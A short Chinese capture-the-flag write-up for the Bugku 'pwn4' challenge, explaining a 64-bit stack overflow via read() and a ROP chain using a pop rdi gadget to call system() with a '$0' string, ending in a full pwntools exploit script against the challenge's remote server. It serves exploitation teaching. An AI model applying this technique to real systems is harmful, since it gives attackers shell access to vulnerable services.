bugku_pwn4 | by AriSan
先 checksec
发现为64位程序,而且没有打开任何保护
然后用ida看一下伪代码,嘿嘿,居然有一个 read
函数,明显的栈溢出。
用 gdb
在进入 read
之前下断点,观察此时 rbp
和 rsp
的值,得到栈空间大小为 0x70-0x60+8
继续ida可以发现很明显的 system
函数,但是却没有 "/bin/sh"
,所以 system
函数的参数需要我们自己传入,说到传参,这是一个64位的程序,而64位程序的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 中,如果还有更多参数才会保存在栈上,所以我需要找到一条汇编语句来改变 RDI
的值,从而改变传入的参数。
但是这个程序中没有像这样的函数提供来让我们传入 "/bin/sh"
这样的字符串。但是!这个程序中有个 $0
,而 system('$0')
可以理解成与 system("/bin/sh")
的效果一样,所以我只需要改变 RDI
中的内容为这个 $0
的地址即可!
from pwn import *
p = remote('114.116.54.89', 10004)
#p = process('./pwn4')
pop_rdi = 0x00000000004007d3
like_bin_sh = 0x000000000060111f
system = 0x000000000040075A
payload = 'A' * (0x10+8) + p64(pop_rdi) + p64(like_bin_sh) + p64(system)
p.recvuntil('Come on,try to pwn me')
p.sendline(payload)
p.interactive()